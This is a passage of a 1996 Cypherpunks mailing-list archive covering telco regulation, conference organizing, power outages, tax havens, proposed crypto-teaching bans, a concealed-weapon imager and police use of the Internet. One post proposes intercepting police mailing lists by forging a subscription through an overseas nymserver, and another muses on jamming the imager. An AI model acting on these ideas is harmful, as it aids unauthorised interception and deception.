> rather than those who wholesale it.

The breakup and the addition of competition and second-tier voice
providors hasn't killed AT&T yet. If anything does, it will be bloated
corporate structure, not 2nd tier competition. (They're working on that -
funny how years ago we spent gobs of tax dollars breaking up AT&T, and now
they've gone and done it to themselves voluntarily). Most second-tier
providors differentiate themselves through marketing and/or customer
service.  Customer service is a big expensive pain in the butt. Many
larger companies out-source it anyway, when they can get away with it. 
Larger companies will still retail large accounts, and leave the smaller, 
less profitable crumbs to the niche marketers.


I still see voice over the Internet as a hobby - nobody is going to spend 
$800 for a telephone, er "voice terminal." If I decide to, who will I 
call? Only others with similar equipment? That's not very functional. 
Yes, this new carrier could implement equipment in each CO to convert my 
call to POTS systems, so I can call my computerless Grandmama from my PC 
- what will this do to costs?

Most of corporate America is still grappling with learning to use email. 
I don't see the business customer buying into voice services via PC anytime 
soon. The equipment costs per user are too high. I started working with a 
whole slew of telephony and convergence products years ago - they've been 
very slow to catch on.

Yes, one day voice, video, and data will all be carried on the same
infrastructure - using ATM, or a similar technology. The convergence is
inevitable. Large corporate phone switches will communicate with the 
outside world via packet switched, rather than circuit switched 
networks. This isn't the same as the "save money on phone calls by 
using cheap Internet bandwidth and your PC"  sales pitch, however. 

ob crypto (for anyone who read this far): When packet switched voice 
systems become a reality, how can secure calls be placed to any number? 
Key exchange during call set-up? How long will this make the call set-up?
Ideas?

-r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 13 Aug 1996 12:43:47 +0800
To: Brian D Williams <cypherpunks@toad.com
Subject: Re: FCC_ups
Message-ID: <v02120d03ae356356fa46@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 8/12/96, Brian D Williams wrote:

> First I would like to mention Lucky that I always enjoy your
>posts. Second I would like to say that as I have mentioned
>previously, the RBOC I work for filed for complete unbundling of
>the local loop in March of 93. We are not the one's holding up the
>show.

Thanks for kind words. I am happy to hear that your RBOC is so enlightened.
I did not mean to exclusively blame the Baby Bells. There is plenty of
blame to go around. Look at the FCC's incomprehensible decision to require
that an ISDN line be billed as two lines, arguing that it requires double
the upstream bandwidth.

I know that I am repeating myself, but here is a brief primer on telco
realities:

There is plenty of upstream bandwidth, since everything but the local loop
is already running on fiber. The problem is in the local loop. In many
cities, there is simply no room left in the ducts to run even one more
wire. Anything, such as ISDN, that can get more lines out of the same
number of wires is a Good Thing to the telcos and the consumers. The
alternative is trenching. An often prohibitively expensive proposal,
especially in a downtown area. The FCC should encourage, not discourage the
use of such wire saving technology.

>10 Mb/s ethernet and 100 ISDN B channels (64k each)? I would
>certainly like to here more! Unfortunately as I have also
>previously pointed out, point-to-point copper is a thing of the
>past, it is rare and expensive now. The current fiber-to-the-curb
>standard involves "slick 96" muxes which use 4 framed T-1's (1.536
>Mb/s) to provide 96 voice channels.

Given the cost of running fiber to the home, the near and intermediate
future is definitely fiber to the curb. The technology we were developing
works beautifully with this set-up. To be more precise, the system provides
a 10Mbps Ethernet, 96 64bps ISDN B channels, a D and an M channel if using
iso-Ethernet based technology. But the key to getting all this bandwidth
isn't iso-Ethernet, it was our chip. This can be done at ~$600/home and for
a low as $100 per node. Yes, this will increase upstream bandwidth
requirements, but as I mentioned earlier, there is plenty of upstream
bandwidth. Last office I worked in was facing an alley full of loading
docks and trash binns. Six feet away from the door ran MFS's OC-48 SONET.

There are of course exceptions. If you live in a very old building, you
might have to rewire. My current apartment uses three wire cabling. I have
no idea what the third wire is good for. You can't run two POTS over three
wires. In a building like this you'd have to rewire. But few office
buildings are likely to have such lousy wiring.

Anyway, I hate to be a tease, but that's about as far as my NDA will let me go.

[Any further dialog in private email, please. Time to take this tread off-list.]



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Aug 1996 09:20:31 +0800
To: cypherpunks@toad.com
Subject: Advice from a CPSR conference organizer on conferences
Message-ID: <01I871902PNK9JD5LV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Given various people on here interested in organizing cryptography
conferences, I thought the below would be interesting.
	-Allen

From: Phil Agre <pagre@weber.ucsd.edu>
X-URL: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/1259

Notes on organizing conferences

Phil Agre
August 1996


This article is adapted from the post mortem that I write immediately
after organizing the 1994 CPSR Annual Meeting, together with notes to
myself from other meetings I have been involved in organizing.  Its
purpose is to offer future organizers the benefit of our experience.

I accepted the job of program chair because I wanted to develop my skills
for organizing events, and I definitely learned some things along the way.
One thing I learned is apparently very subtle, since I've never seen or
heard of anybody explaining it.  The professional world has a special way
of defining identity: people are identified with issues.  When I started
planning the program, my initial approach was simply to start with the
most dynamic individuals in the general area that CPSR covers.  So I sent
out a batch of e-mail messages to well-connected personages, asking them
who we should get to speak.  Alas, few of them were able to say anything
very useful, saying (usually in a nice way) that they regarded my request
as overly vague.  I gather that one is supposed to decide first what
issues to cover, and then ask who is associated with that issue.  For
example, "who are some good people to speak on the political aspects
of building community networks?"  Or, "who is a good person to speak on
technology activism on issues affecting people with disabilities?"  This
is nearly the only form of question I could get answered.  Even a simple
variant like, "who has something fresh and original to say about topic X?"
didn't work very well.  It's as though everyone maintains a lookup table
in their heads, indexing people to issues.

Having started this way, some other problems then arise.  Sometimes you
can't get the number one speaker on a given issue to speak, so then you
ask who else you might get, and you'll get some more names.  It's good
to ask whether so-and-so is a good speaker or not.  Sometimes you'll hear
someone say something bad (or something diplomatically irrelevant) about
a potential speaker whom you haven't met, and such comments will probably
weigh heavily with you, for the simple reason that it's a disaster to
schedule an unskilled or irresponsible speaker on your program.  This
dynamic bothered me, since it seemed to have a built-in tendency to
reinforce a single individual's standing even though other people might
be equally talented; if someone already has a reputation as a speaker
in a given area, those other people don't get invited to speak, so they
can't develop reputations as speakers.  I had a certain amount of success
asking, "who deserves a chance to be heard on this issue?", and some
people even volunteered the names of people who they felt deserved a
chance.  This made me feel better.

Start early.  You need to get your publicity out in time for monthly
publications listing in their schedule.  I don't know when precisely this
is, since we didn't come close to making the deadline.  I didn't start
the publicity machinery for our October conference until we had every last
speaker pinned down in early summer.  Big mistake: people go on vacation
in the summer, and your rate of progress in assembling the program will
plummet starting in late June.  Identify your prominent, featured speakers
and get them pinned down first; they're the only ones you need to get your
publicity under way.  I found e-mail seductive; it's easy to publicize
something to the whole net in a few days, so I conveniently forgot that
large parts of the world don't read announcements on the net -- print
publicity is still absolutely necessary.

We had a professional PR person working for us.  She works at UCSD in the
PR office.  She's perfectly good at her job, but I've learned some lessons
for working with such people in the future.  One is to clarify goals.
My central goal was to get a lot of interesting people to attend our
meeting; this meant PR aimed at obtaining advance publicity.  UCSD's main
goal, though, was to get lots of press coverage on the day of the meeting
itself; this meant PR aimed at getting reporters to attend the meeting.
These two goals are equally valid, but they happen on different schedules.
Local advance publicity mostly happened in the three or four days before
the meeting, and with a little effort we did well.

We made some mistakes in the meeting brochure.  One was that the brochure
only mentioned the three main speakers, even though it had room for
much more.  This might not have been so bad, except that the three-line
summaries of those three speakers' speeches all sounded pretty similar.  I
have no way of knowing how much difference this made to the final turnout,
but I do think we should have taken more conscious care to identify broad
categories of people we wanted in attendance, and then making sure each
one sees something on the brochure that they find appealing.  When this
problem came up, we made a single-page (front and back of a green sheet of
paper) version of the electronic meeting announcement, including the full
program and registration information.  We ended up distributing hundreds
of these, and I am sure that they gave lots of people a good idea of what
the organization is about.

I made some mistakes when booking the speakers for the meeting.  I don't
regret any of the people we chose, though I ended up disagreeing with
a couple of them much more intensely than I had thought I would.  The
problem was with financial matters.  We had a $500-per-speaker budget for
people who were coming from outside California, so we had to minimize the
number of such people.  The problem is that some speakers simply cannot
attend for $500, since their travel expenses simply cannot be covered for
$500.  My response to this problem was denial: I just got vague and hoped
it would go away.  But of course it didn't.  Some speakers took losses
despite my clear statement of the $500 limit, and I should have been even
clearer with them that they should book flights etc right away to ensure
that their losses are not greater than they're happy with.  The reason
I didn't do these things was that I was focused on getting the people
to accept our invitations, especially in one case where our first choice
declined after weeks of hemming and hawing.  (If you're invited to speak
at a conference, please decide whether to accept right away.)

One thing we did right was to send out a press release.  The UCSD PR
person wrote it.  I thought that the press release, like all of the press
coverage, tended to trivialize things with buzzwords like "access to the
information superhighway".  But I was repeatedly assured that that's how
it is: you have to use words that people understand.  Anyway, we sent
our press release out on PR Newswire, and I mailed it to all of the local
computer press.  I also mailed it to an eccentric local newspaper that's
distributed free in coffee houses, and they reprinted it verbatim.  I
found that San Diego has all kinds of free publications that I hadn't even
heard of, including something called Terminal Velocity that's aimed at the
cyberculture and comics crowd -- 40,000 circulation.  Not to be sneezed at.

One issue was the phone number to use in the press release -- where should
people call for more information about the meeting?  At first I used the
CPSR number in Palo Alto since nobody here wanted to field a million phone
calls.  But this was a mistake.  Lots of people don't want to call long
distance, and once I broke down and started listing my own office phone
number, I only got a couple dozen calls, including several calls from very
interesting people.  The only category of calls that bothered me was from
people wanting technical help with their computers.  Most of these calls
were easy enough, since I could send them to local user groups, but one
of them was extremely obnoxious.  On the whole, being the contact person
listed in these publications was a far more positive experience than I
thought it would be.

Another thing we did right was outreach.  This was a principle of the
meeting from the beginning.  Think of the meeting as primarily an occasion
for organizing.  Call people on the phone, tell them about the meeting,
and ask them who you should be speaking with.  At the very beginning of
the process, write a small announcement of the meeting and invite people
to become involved and sent it out on the net; we got some excellent
contacts this way.  The Internet may not reach the masses yet, but we
found that San Diego now has a pretty reasonable density of Internet
penetration among computer people.  Announcements about CPSR events here
have reached all sorts of interesting people by being passed hand-to-hand
through the net.  We made dozens of phone calls along the way: computer
user groups, Latino organizations, city government, political activists,
commercial Internet providers, BBS operators, industry people, and so
forth.  People have heard about the "info highway", so your job is to get
your message boiled down to something that sounds like your interlocutor's
next step on their way to the net.  Don't try to "sell" your organization
or issue to someone who's not interested; rather, if they're already
interested in the issues then make the meeting process tangible for them.
We visited a number of computer user group meetings; I also called up the
organizers of several such meetings and asked if they would be willing to
announce the Annual Meeting, and sent them copies of the aforementioned
"green sheet" schedule.

Early on in the process, I organized a speaker series that Dave Noelle did
good publicity for, making posters and sending them to various people and
publications.  Since the first speaker's topic was privacy, the "Reader"
(free weekly tabloid) decided to feature her talk, and their article drew
a few dozen people.  We also sent the announcements out on the Internet,
and each talk had at least a couple dozen people.  At the beginning of
each talk, I introduced myself and told people about the conference.
We sent around a sign-up sheet.  We got a bit of a mailing list and some
good contacts from that process, but I cannot swear that it was really
worth all the effort.  Maybe we would have reached those people through
other channels.  The speaker series was intellectually worthwhile though.

The meeting weekend itself was so thoroughly organized, primarily by the
local librarians, that it's hard for me to draw any particular lessons
besides getting good people to do the work.  Typing this now, I can't
think of anything that went wrong that's worth telling you about.

Oh yes.  We got screwed by the student center, whose new management
decided that she wasn't interested in honoring the agreement we had made
with her predecessor.  Of course we didn't have it in writing, because
we had been assured that we didn't *need* to have it in writing.  After I
grouched at her a while, she told us that she would "honor your agreement"
by charging us 2.5 times what that agreement had called for.  I flipped
out and decided that we would move the meeting to an engineering lecture
hall that I could book for free because I'm a professor.  But hey -- if I
wasn't a professor then we could have been shafted.  So remember, get it
in writing.  No matter what conversations you've had with them, they've
always got more rules printed on sheets of paper that you've never heard
about.  You can't enforce your agreements until they're written down.

And beware of those extra little charges.  We were told that the banquet
would cost $X per person, but when the paperwork finally arrived, that
turned out to mean $X plus tax and gratuity plus a $400 "facility fee".
(I then got this infuriatingly condescending little speech to the effect
that this is a standard industry practice -- i.e., everyone does it --
and that I must therefore not know what I'm doing.  But setting out to
take revenge about such things will probably not serve your real goals.)
Get it in writing.

In doing the early outreach, I had to learn some lessons.  I know that
it's good to consult people: call them, visit them, tell them what you're
doing, and say "what advice do you have for me?".  This makes friends for
you and the organization and makes people feel included.  It also prevents
you from being perceived as grabbing someone else's turf -- that is,
claiming sovereignty over an issue that someone else has invested effort
identifying themselves with already.  Often the people you talk to will
actually have good advice for you.  (If they have an agenda or an axe then
you can usually figure out what it is and steer around it.)  Find out who
knows people and approach them this way.  They don't have to be obvious
allies.  Even people who specialize in elite networking in your city are
perfectly good candidates for this, though you should pick the highest
status individual in your organizing group to approach such people.  A
professor of any rank will do fine.  Get rid of your political jargon.
Be able to talk to people in language they can understand.  Evolve a bunch
of honest ways of explaining what the meeting is about.  If you cannot
come up with an honest way of explaining your meeting to someone then that
person is not part of your audience.  If they *ought* to be part of your
audience then you need to go back and redesign the meeting.

Anyway, this cycle of asking advice sometimes became clumsy when I was
speaking with someone who wanted to be a speaker at the meeting.  It's
hard to invite someone to participate in a meeting and simultaneously
tell them they can't speak at the meeting.  So decide ahead of time which
people might want to be speakers, and what you'll say when they explicitly
ask you to put them on the program.  The standard response is to hide
behind your program committee, saying "that would be great, I'll take
it up with the program committee".  But a lot of people don't buy that.
So you won't always end up on perfectly positive terms with people.

One way you can be helpful to people is to explicitly invite them to make
their organization's (or company's, or whatever) literature available on
the conference literature tables.  We had several books and journals being
advertised, along with several nonprofit Internet providers and local
computer organizations.  I'm sure we could have had many more if I had
gotten those literature invitations out earlier.

Anybody who isn't attending your meeting on a corporate expense account
will care a lot about how much it costs.  Make it cheap.  If you work with
professional meeting organizers, or people who are accustomed to the world
of expense accounts, you will have to resist their seemingly inexorable
impulses to make everything "nice" by piling on exotic banquets, racks
of A/V equipment, free notebooks for everyone, hotel rooms for speakers,
nice little selections of juices and cookies at breaks, and so on.  These
people mean well, but you will need to bring them back to fiscal reality
gently, step by step.

Make conscious choices about who should run panels, give opening and
closing remarks, introduce speakers, etc.  We made good choices, but I
wasn't thinking about the issue until very late.

If you have any speakers in wheelchairs, plan way ahead for their housing
and transportation.  Carefully walk the whole path that they will need
to travel from curbside to podium, and make extra sure that the necessary
doors will be unlocked for handicapped access, including bathrooms.

I didn't like the page I wrote about the Annual Meeting for the summer
issue of the CPSR Newsletter.  I *should* have written an advertisement
aimed at turning out the maximum number of CPSR members, most of whom
have had rather little personal contact with the organization and really
do need to be "sold" on the Annual Meeting, which after all requires a
real expenditure of time and money.  Instead I wrote a fancy think piece
about strategy and gave too much attention about our plans to connect to
the local community.  I'm glad that we connected to the local community,
but that was not the major message to emphasize for people from outside
the local community.

We put up a WWW page for the Annual Meeting program and registration.
It was fun, but I have no idea what difference it made.  I *do* know
that it's useless to put up a WWW page unless you advertise it by sending
messages to various mailing lists.

When you're about to choose a date for the meeting, make sure you ask
all of the people who know lots of organizations.  We had an unfortunate
conflict with a AAAS/ABA workshop on cyberspace ethics and law in
Washington.

Get people together early and brainstorm about the meeting.  People have
lots of great ideas.  Let their ideas influence you so that your thinking
is broadened and you're making your decisions more consciously than you
might be otherwise.

I was glad that we clarified early what jobs the National Office does.
They ended up doing some extra jobs, and we ended up doing pieces of
some things that I had originally been happy to let them do, but clear
assignments of tasks are good.

Draw on the experience of the people who have organized the meeting in
earlier years.  And then when you're done, write down your own experiences
to benefit others.

 - end -




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Tue, 13 Aug 1996 11:11:49 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: [NOISE] Newspapers and basic science (was: US Power Outages)
In-Reply-To: <4uo8jp$t5o@abraham.cs.berkeley.edu>
Message-ID: <Pine.3.89.9608121627.A22335-0100000@netcom11>
MIME-Version: 1.0
Content-Type: text/plain


Well, all I remember is the 3-1/2 Seattles part - I put the"for a day" 
part in because I wasn't sure about it.  


Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127


On 12 Aug 1996, Ian Goldberg wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> <GRUMBLE>
> Watts are a measure of energy per unit time; it makes sense to say
> "60 W powers a light bulb", not "60 W powers a light bulb for one hour".
> </GRUMBLE>
> 
> But my _favourite_ example of this was a newspaper clipping I used to have
> that said that in the previous month, the city had received "160 square
> pounds of rain".   That just defied common sense.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 13 Aug 1996 08:35:16 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
Message-ID: <2.2.32.19960812211714.00887048@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:22 AM 8/12/96 -0400, Vincent Cate wrote:
>
>
>Think your lawyer would be willing to give his name and a statement on
>this?  If a cypherpunk ever got in trouble and could say, "I was told by
>the lawyer XYZZY this was legal", it might help.  :-)
>
>  --  Vince

I didn't say it was legal.  I said it wasn't fraud.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 13 Aug 1996 08:21:41 +0800
To: jim bell <stewarts@ix.netcom.com>
Subject: Re: US Power Outages
Message-ID: <2.2.32.19960812211716.00893f04@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 AM 8/12/96 -0800, jim bell wrote:
>This morning, I read the new claim: extreme heat (presumably assisted by 
>heat dissipated in the power line itself) cause the power cables near The 
>Dalles (about 100 miles east of Portland, along the Columbia river) to 
>stretch and sag, eventually shorting themselves out to trees near the ground.

The real cause was inadequate supply of nuclear power plants caused by
technophobe agitation.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 13 Aug 1996 08:50:39 +0800
To: cypherpunks@toad.com
Subject: Re: A ban on cryptography?
Message-ID: <2.2.32.19960812211718.008814cc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:53 AM 8/12/96 -0700, Timothy C. May wrote:
>
>       `(l) It shall be unlawful for any person to teach or demonstrate the
>use of cryptographic systems, or to distribute by any means information
>pertaining to, in whole or in part, the construction of digital ciphers,
>if the person intends or knows, that such cryptographic materials or
>information will be used for, or in furtherance of, an activity that
>constitutes a Federal criminal offense or a criminal purpose affecting
>interstate commerce.'.

Luckily, the nature of the Web is such that publicly placing something on a
server would probably never be held to fulfill your or Di Fi's intent
language.  You are clearly making it available to all comers.  No specific
customer at all since anyone can read it.  

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 13 Aug 1996 11:54:18 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88A7.0F5BA1C0@groningen04.pop.tip.nl>
Message-ID: <Pine.SUN.3.91.960812171348.20506E-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 12 Aug 1996, Bart Croughs wrote:

> My statement that the wages depend on the amount of capital
> invested, has received a bad press. I thought cypherpunks were 
> economically literate, so I didn't explain the principle and I
> didn't give any sources for further reading. This proved to be
> a mistake.
> 	To avoid this kind of uninformed criticism in the future,
> I recommend my critics read the following books, which can all
> be ordered from Laissez-Faire Books...yada, yada, yada.

Been there, done that.  I repeat, the error that Bart made is
assuming that because some US-source capital gets redirected 
overseas, that the total amound of capital investment will 
decline thus producing the wage drop he is fretting about.
Unless he can show that foreign capital investment will not flow
to US workers who are "forced" into working in industries where
they have a comparative advantage, his argument must fail.  After
all, I--like the economists Bart cite--think international free
trade, the free flow of capital in persuit of the highest return
and division of labor are a GOOD thing.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 13 Aug 1996 08:32:12 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Name search -- Enigma owner
Message-ID: <199608122123.RAA04344@nrk.com>
MIME-Version: 1.0
Content-Type: text


There was a person in .ch with with several Enigmas, including
a four-rotor Naval model. I think his name was ?Fro....?

Does anyone recall the person I mean?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 13 Aug 1996 12:02:30 +0800
To: cypherpunks@toad.com
Subject: Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <01I876465KRK9JD5RL@mbcl.rutgers.edu>
Message-ID: <199608130043.RAA02224@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Color me skeptical.

"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> writes:

 > The gadget doesn't send out X-rays; instead, it picks up
 > electromagnetic waves emitted by human flesh.

Would these electromagnetic waves be something distinct from the
blackbody spectrum of a human-sized blob of "mostly water" at the
appropriate temperature?

Or to put it another way, is this just a sophisticated IR imager
thickly coated in snake oil and marketing hype?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 13 Aug 1996 14:39:36 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: US Power Outages
In-Reply-To: <2.2.32.19960812211716.00893f04@panix.com>
Message-ID: <Pine.SOL.3.91.960812183505.21176C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Portland General Electric shut down a big, perfectly good nuke a couple 
of years ago since there was ample cheap power to replace it.

So they said.

bd


On Mon, 12 Aug 1996, Duncan Frissell wrote:

> At 10:15 AM 8/12/96 -0800, jim bell wrote:
> >This morning, I read the new claim: extreme heat (presumably assisted by 
> >heat dissipated in the power line itself) cause the power cables near The 
> >Dalles (about 100 miles east of Portland, along the Columbia river) to 
> >stretch and sag, eventually shorting themselves out to trees near the ground.
> 
> The real cause was inadequate supply of nuclear power plants caused by
> technophobe agitation.  
> 
> DCF
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Time Keeper) <fair@cesium.clock.org>
Date: Tue, 13 Aug 1996 13:50:22 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: "X-Ray Gun" for imperceptible searches
Message-ID: <v02140b09ae3588467e34@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


I wonder how well the imager works through mylar or gold lame' clothing (or
other high-metal content clothing)?

        curious,

        Erik






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vince <demo@offshore.com.ai>
Date: Tue, 13 Aug 1996 10:18:54 +0800
To: an584514@anon.penet.fi
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
In-Reply-To: <9608121346.AB00628@anon.penet.fi>
Message-ID: <Pine.LNX.3.91.960812184538.6873A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




> >  And Anguilla is first and foremost a taxhaven.  But it tries hard to be a
> >  very clean taxhaven (does not want drug money etc).  I think that "clean"
> >  corporations operating here tax free is a potentially huge market.
> 
> This is an illusion.  There ain't no such thing as a clean corporation
> operating in a clean tax haven.  Every overseas corp that is doing
> something they can't do without interference back onshore, is running the
> gauntlet.

In taxhaven industry jargon, "clean" means they are avoiding taxes only. 
No drugs, no money laundering, no violent crime, no stolen money, no
fraud. 

Many fortune 500 companies have offshore corporations for "self
insurance".  Many many movies have corporations offshore just for that
movie.  These are type of "clean" corporations that taxhavens like. 

   --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Aug 1996 10:30:13 +0800
To: cypherpunks@toad.com
Subject: "X-Ray Gun" for imperceptible searches
Message-ID: <01I876465KRK9JD5RL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would wonder if a jamming device (preferably area-effect with a 
slowly randomly varying swathe of area, to avoid figuring out who was carrying
it) would be possible, or some variety of shielding (i.e., emitting waves
looking similar to flesh).
	-Allen

>   Direct Media
>                    NEW X-RAY GUN TRADES PRIVACY FOR SAFETY
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Associated Press

>   SANTA MONICA, Calif. (Aug 12, 1996 09:47 a.m. EDT) -- The latest
>   weapon against terrorism can see right through you.
   
>   The Passive Millimeter Wave Imager can X-ray through clothing to "see"
>   a concealed weapon, plastic explosives or drugs. A police officer can
>   surreptitiously aim it into a crowd from as far away as 90 feet.
   
>   The new X-ray gun is becoming a symbol for an unlikely alliance of
>   civil libertarians and gun owners who fear the fight against crime and
>   terrorism may be waged at the expense of personal freedoms.
   
>   "I'm incredibly concerned," said John Henry Hingson, a past president
>   of the National Association of Criminal Defense Lawyers, meeting here
>   this past week. "The entire nation could become a victim of illegal
>   searches and seizures and the law is powerless to protect them from
>   these police abuses."
   
>   But in these nervous times following the the crash of TWA Fight 800
>   and bombings at the Olympics, Oklahoma City and the World Trade
>   Center, many Americans are now willing to trade some of their privacy
>   and civil liberties for greater security.
   
>   A poll last week by the Los Angeles Times found that a majority of
>   people -- 58 percent -- said they would curtail some civil liberties
>   if it would help thwart terrorism. Thirteen percent said it would
>   depend on what rights were at stake. The poll didn't ask people to
>   single out any rights.
   
>   The Clinton administration has proposed increased wiretapping and
>   other anti-terrorism steps, and is doling out research grants for
>   cutting edge anti-crime technology that once may have been intended
>   for only military use.
   
[...]
   
>   Two models are being developed of the Passive Millimeter Wave Imager,
>   a creation of Massachusetts-based Millimetrix Corp.
   
>   The larger one, about the size of a shoebox, is mounted on a patrol
>   car and pointed at the unsuspecting person. The gadget doesn't send
>   out X-rays; instead, it picks up electromagnetic waves emitted by
>   human flesh.
   
>   Anything that stands in the way of those waves -- like a gun -- or
>   anything that emits weaker waves -- like a bag of cocaine or a plastic
>   explosive -- will show up on a little screen in the patrol car.
   
>   Clothes emit no waves. Neither do walls, allowing the device to be
>   used from even outside a room.
   
>   A second model is a smaller, battery-operated version that an officer
>   can operate by hand, like a radar gun.
   
>   Millimetrix hopes to field test the larger model soon at a police
>   agency.
   
>   Hingson argues the device runs roughshod over bans against illegal
>   searches and seizures. The law says police can stop and frisk a person
>   only when an officer has a "reasonable suspicion" the person is armed
>   or involved in a crime.
   
>   Millimetrix points out that while the imager can see through clothing,
>   it still leaves people some privacy. The device's display screen, the
>   company says, "does not reveal intimate anatomical details of the
>   person."
   
>   Chip Walker, spokesman for the National Rifle Association, noted that
>   devices like the imager threaten the legal rights of people in 31
>   states who are allowed to carry concealed weapons with proper
>   licenses.
   
>   "We certainly support efforts to disarm criminals, but we need to be
>   careful that we're not painting with too broad a brush here," he said.
   
>   Walker said that as troubling as terrorism is, people may be playing
>   into terrorists' hands by giving up their privacy.
   
>   "One of the broader issues is that if we start giving up certain civil
>   liberties, that essentially means that the terrorists are starting to
>   accomplish one of their goals," he said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Aug 1996 10:29:47 +0800
To: cypherpunks@toad.com
Subject: Police on the Net
Message-ID: <01I876IU1AN89JD5RL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	First, I'd be interested in knowing some of those online reporting
addresses, and how much limits they place on what can be mailed to them...
persuading these cops to deal with the improper use of another's computer
(i.e., spam) would seem to be a distinct possibility in diverting them from
other activities. Second, it would appear possible (unless they're encrypting
it) to intercept some of these email lists of theirs - if necessary, by
forging a subscribe to an _overseas_ nymserver that isn't too well known
(unlike, say, anon.penet.fi). That's about on the same grounds as their
mention of "know thine enemy." (It is, of course, pretty certain that
various libertarian groups are among those monitored, such as cypherpunks.)
Third, this gives additional reasons not to give out one's address to anyone.
What people know about me is a post office box and my old address.
	-Allen

>   webslingerZ
>                      LONG ARM OF THE LAW IS GOING ONLINE
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Seattle Post-Intelligencer
      
>   (Aug 10, 1996 00:05 a.m. EDT) -- When police "net" a crook these days,
>   cops may be referring to the Internet.
   
[...]

>   On the Internet, citizens anonymously report drug dealers to the
>   cyberpolice, check out crime in their neighborhoods, calculate their
>   risk of being murdered and communicate directly with the chief of
>   police.
   
>   Police say the Internet is a powerful and versatile law-enforcement
>   tool: Communication is immediate and crosses jurisdictional
>   boundaries, information is just a keystroke away and the cost is
>   commonly less than hiring a police officer.
   
>   "I think it's the most effective money you can spend to prevent
>   crime," said Bill Taylor, crime analyst for the Sacramento, Calif.,
>   Police Department, which has developed one of the nation's most
>   sophisticated Internet police sites.
   
>   More than 2,000 law-enforcement agencies have gone online, extending
>   the long reach of the law to millions of Internet users, said Ken
>   Reeves, a Microsoft manager who recently established a Web site
>   promoting new technology in law enforcement.
   
>   "They're creating virtual police," he said.
   
[...]

>   The Internet also has become a popular tool for police to communicate
>   among themselves.
   
>   Thousands of police officers subscribe to electronic mailing lists and
>   read electronic bulletin boards where they can discuss ethical issues
>   in private and exchange information about firearms, narcotics and
>   other sensitive topics.
   
>   "These are things you don't want to make public, but you need other
